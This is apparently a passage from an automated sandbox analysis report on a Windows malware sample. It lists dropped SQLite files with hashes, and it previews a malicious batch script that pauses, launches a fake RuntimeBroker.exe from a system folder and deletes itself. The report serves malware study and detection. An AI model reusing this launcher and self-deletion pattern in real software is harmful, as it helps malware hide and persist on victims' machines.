                                                                                  SHA-256:BCFC207D70BB96A252599F407830E5ABC678E39C203FE489CE9010AE367D9493
                                                                                  SHA-512:23DCC82B63997A7CE888CF1A46EEF54BBF00C2DC7874F617D80B2D1D7BC1138B75D066AA7885B95E76ABDF2B94A2ACF10D464E25D5A7120E977CE1AD54E2EA59
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                  Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Windows\LiveKernelReports\RuntimeBroker.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\HArqwkOZhw.bat"

                                                                                  C:\Users\user\AppData\Local\Temp\HLtjQkDKgJ

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\I8QecQ6teO

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.1239949490932863
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\ILsVoJuzGv

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136471148832945
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\IlI66YRGfo

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.1239949490932863
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\Iu5hBwC0D9

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136471148832945
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\J60ruFRGV4

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\J7UqBuxD3j

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136471148832945
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\Jn3G8klyxY

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.1239949490932863
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\Jup0iOChsz

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\KFoqr2ejzM

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136471148832945
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\KIbmTcBYwh

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136471148832945
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\KxTBxmfuHr

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                                                  Category:dropped
                                                                                  Size (bytes):51200
                                                                                  Entropy (8bit):0.8745947603342119
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                                                  MD5:378391FDB591852E472D99DC4BF837DA
                                                                                  SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                                                  SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                                                  SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\KyWyfHACIC

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.1239949490932863
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\LY6TIROFD7

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.6732424250451717
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                  MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                  SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                  SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                  SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\MRTGAtKHTK

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):98304
                                                                                  Entropy (8bit):0.08235737944063153
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                  MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                  SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                  SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                  SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\MbPvA7qIpq

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136471148832945
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\N1Ovr3n8lJ

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136471148832945
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\NBSEdNxulo

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.1239949490932863
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\NKnwNZvpKJ

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136471148832945
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\NOQwspsIcU

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.1239949490932863
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\NXEWuyzxbY

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                                                  Category:dropped
                                                                                  Size (bytes):51200
                                                                                  Entropy (8bit):0.8745947603342119
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                                                  MD5:378391FDB591852E472D99DC4BF837DA
                                                                                  SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                                                  SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                                                  SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\Nk3oF5AD7f

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\ORbsna6zr0

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.8508558324143882
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                                                  MD5:933D6D14518371B212F36C3835794D75
                                                                                  SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                                                  SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                                                  SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                                                  Malicious:false
